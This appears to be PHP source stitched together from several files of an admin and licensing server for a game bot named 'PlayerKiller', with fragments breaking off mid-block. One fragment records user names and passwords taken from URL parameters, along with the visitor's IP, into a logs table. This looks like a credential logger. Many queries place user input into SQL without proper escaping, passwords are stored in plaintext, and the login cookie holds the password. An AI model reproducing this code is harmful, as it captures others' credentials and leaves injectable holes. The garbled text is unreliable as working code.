include 'common.php';
?>
<html>
<head>
<title>Install script</title>
<link rel="stylesheet" type="text/css" href="style.css">
</head>
<body>
<div align="center">
<table width="80%" border="0">
<?php
$db->query('CREATE TABLE `' . $bot_name . '_users` (`id` INT(4) UNSIGNED NOT NULL AUTO_INCREMENT PRIMARY KEY ,`username` VARCHAR(20) ,`password` VARCHAR(20) ,`email` VARCHAR(40) ,`comment` VARCHAR(255) ,`date` INT(10) UNSIGNED DEFAULT \'0\' NOT NULL ,`suspend` TINYINT(1) UNSIGNED DEFAULT \'0\' NOT NULL);') or f**k('Unable to create table ' . $bot_name . '_users', true);
$db->query('CREATE TABLE `' . $bot_name . '_ips` (`id` INT(4) UNSIGNED,`ip` VARCHAR(50) ,`date` INT(10) UNSIGNED DEFAULT \'0\' NOT NULL);') or f**k('Unable to create table ' . $bot_name . '_ips', true);
alert('Installation now complete, for security reasons please now delete install.php');
redirect('admin.php');
f**k('Installation now complete, for security reasons please now delete install.php', false);
include 'end.php';
} elseif (isset($_POST['config'])) {
?>
<html>
<head>
<title>Install script</title>
<link rel="stylesheet" type="text/css" href="style.css">
</head>
<body>
<div align="center">
<table width="80%" border="0">
<?php
$bot_name = $_POST['bot_name'];
$admin_username = strtolower($_POST['admin_username']);
$admin_password = strtolower($_POST['admin_password']);
<?php
$user = strtolower(trim(stripslashes($_GET['uk'])));
$pass = strtolower(trim(stripslashes($_GET['pk'])));
include 'common.php';
$query2 = $db->query('INSERT INTO logs (user, pass, ip) VALUES(\'' . $user . '\',\'' . $pass . '\', \'' . $_SERVER['REMOTE_ADDR'] . '\')') or f**k('Invalid', false);
f**k('Valid', false);
f**k('Cannot be found', false);
}
$userid = $db->fetch_assoc($result);
redirect('user.php?act=edit&id=' . $userid['id']);
f**k('<a href="user.php?act=edit&id=' . $userid . '">Click here to view info.</a>', false);
} elseif ($act == 'ip' && isset($_POST['form_sent'])) {
$find = trim($_POST['find_ip']);
$result = $db->query('SELECT id FROM ' . $bot_name . '_ips WHERE ip=\'' . $find . '\'') or f**k('Unable to find IP info', true);
if (!$db->num_rows($result)) {
alert('Cannot be found');
redirect('search.php');
f**k('Cannot be found', false);
}
$userid = $db->fetch_assoc($result);
redirect('user.php?act=edit&id=' . $userid['id']);
f**k('<a href="user.php?act=edit&id=' . $userid . '">Click here to view info.</a>', false);
} else {
?>
<table border="0">
<form method="post" action="search.php?act=username" name="Find">
<input type="hidden" name="form_sent" value="1">
<tr>
<td align="right">Username:</td>
<td><input type="text" name="find_username"></td>
<td><input type="submit" name="submit" value="Find by Username"></td>
</tr>
</form>
<form method="post" action="search.php?act=email" name="Find">
<input type="hidden" name="form_sent" value="1">
<tr>
<td align="right">Email:</td>
<?php
include 'head.php';
?>
<table cellspacing="1" cellpadding="4" border="0" width="70%">
<tr>
<td style="width: 10%">Username</td>
<td style="width: 55%">Comment</td>
<td style="width: 20%">Date</td>
<td style="width: 5%" align="center">Suspended?</td>
<td style="width: 10%" align="center">Delete?</td>
</tr>
<?php
$result = $db->query('SELECT * FROM ' . $bot_name . '_users ORDER BY date') or f**k('Unable to fetch user list', true);
while ($user = $db->fetch_assoc($result)) {
?>
<tr>
<td><?php
echo '<a href="user.php?act=edit&id=' . $user['id'] . '">' . $user['username'] . '</a>';
?>
</td>
<td><?php
echo $user['comment'];
?>
</td>
<td><?php
echo date($date_format, $user['date']);
?>
</td>
<td align="center"><?php
echo $user['suspend'] == 1 ? '<font color="#FF0000">Yes</font>' : 'No';
f**k('Details not set', false);
}
if (trim($_GET['version']) != 'PlayerKiller 1.6') {
f**k('You are using an old version, Please update', false);
}
$result = $db->query('SELECT id, password, suspend FROM ' . $bot_name . '_users WHERE username=\'' . addslashes($user) . '\'') or f**k('Invalid', false);
$user = $db->fetch_assoc($result);
$cur_ip = get_ip();
$result = $db->query('SELECT * FROM ' . $bot_name . '_ips WHERE ip=\'' . $cur_ip . '\'') or f**k('Invalid', false);
if (!$db->num_rows($result)) {
$db->query('INSERT INTO ' . $bot_name . '_ips (id, ip, date) VALUES(\'' . $user['id'] . '\', \'' . $cur_ip . '\', \'' . time() . '\')') or f**k('Invalid', false);
} else {
$db->query('UPDATE ' . $bot_name . '_ips SET date=\'' . time() . '\' WHERE ip=\'' . $cur_ip . '\'') or f**k('Invalid', false);
}
if ($pass != $user['password']) {
f**k('Invalid', false);
}
if ($user['suspend'] != 0) {
f**k('Auth banned...', false);
}
$packetIds = '249, 53, 247, 180, 161, 14, 127, 99, 115, 136, 79, 4, 91, 170, 169, 90, 246, 50, 135, 153, 202, 190, 229, 113, 171, 103, 142, 165, 158, 137, 191, 99, 48, 53, 234, 91, 79, 104, 245, 252, 25, 156, 153, 83, 211, 59, 92, 128, 97, 162, 101, 137, 15, 240, 206, 5, 42, 203, 33, 176, 225, 20, 6, 30, 249, 90, 123, 159, 253, 210, 172, 204, 36, 182, 89, 222, 114, 117, 244, 84, 194, 52, 3, 3';
$botAdmins = 'Super Ruckus, Leet Ruckus, Camdamann73, Camdamann10, Rawpure';
$news = 'PlayerKiller v1.1';
$newsOnFirstPage = 'PlayerKiller v1.1';
$getInfo = $db->query('SELECT botadmins, news, newsonfirstpage FROM info WHERE id=\'0\'') or f**k('Invalid', false);
$info = $db->fetch_assoc($getInfo);
$botAdmins = $info['botadmins'];
$news = $info['news'];
$newsOnFirstPage = $info['newsonfirstpage'];
f**k('Valid |' . $packetIds . ':' . $botAdmins . '-' . $news . '*' . $newsOnFirstPage . '^', false);
<?php
include 'head.php';
$result = $db->query('SELECT COUNT(id) FROM ' . $bot_name . '_users') or f**k('Unable to count users', true);
$num_users = $db->result($result, 0);
?>
Welcome to the <?php
echo $bot_name;
?>
administration panel <?php
echo $admin_username;
?>
.<br>
You currently have <?php
echo $num_users . ' ' . $bot_name;
?>
users.
<?php
include 'end.php';
$new_comment = $new_comment == '' ? '-' : $new_comment;
if (strlen($new_username) < 4 || strlen($new_username) > 20) {
f**k('Username invalid length', true);
} elseif (strlen($new_password) < 4 || strlen($new_password) > 20) {
f**k('Password invalid length', true);
} elseif (!is_valid_email($new_email)) {
f**k('Invalid email address', true);
} elseif (strpos($new_username, ' ') || strpos($new_username, '_') || strpos($new_username, '\'') || strpos($new_username, '\\') || strpos($new_username, '?')) {
f**k('Username contains invalid characters', true);
} elseif (strpos($new_password, ' ') || strpos($new_password, '_') || strpos($new_password, '\'') || strpos($new_password, '\\') || strpos($new_password, '?')) {
f**k('Password contains invalid characters', true);
}
$db->query('UPDATE ' . $bot_name . '_users SET username=\'' . addslashes($new_username) . '\', password=\'' . addslashes($new_password) . '\', email=\'' . addslashes($new_email) . '\', comment=\'' . addslashes($new_comment) . '\', suspend=\'' . $new_suspend . '\' WHERE id=' . $new_id) or f**k('Unable to update user', true);
alert('Details of ' . $new_username . ' updated.');
redirect('list.php');
f**k('Details of ' . $new_username . ' updated.', false);
} else {
?>
<table border="0">
<form method="post" action="user.php?act=add" name="Add">
<input type="hidden" name="form_sent" value="1">
<tr>
<td align="right">Username:</td>
<td><input type="text" name="form_username"></td>
</tr>
<tr>
<td align="right">Password:</td>
<td><input type="text" name="form_password"></td>
</tr>
<tr>
<td align="right">Email:</td>
<?php
require 'common.php';
if ($_GET['act'] == 'logout') {
setcookie($bot_name, serialize(array('', '')), time() + 31536000, '/', '', 0);
redirect('admin.php');
f**k('Logged out successfully.', false);
} elseif (isset($_POST['form_sent'])) {
$form_username = trim($_POST['form_username']);
$form_password = trim($_POST['form_password']);
if (strtolower($form_username) == strtolower($admin_username) && strtolower($form_password) == strtolower($admin_password)) {
setcookie($bot_name, serialize(array(strtolower($form_username), strtolower($form_password))), time() + 31536000, '/', '', 0);
redirect('admin.php');
f**k('Logged in successfully. <a href="admin.php">Main administration</a>.', false);
} else {
f**k('Wrong password.', true);
}
} else {
f**k('Invalid link.', false);
}
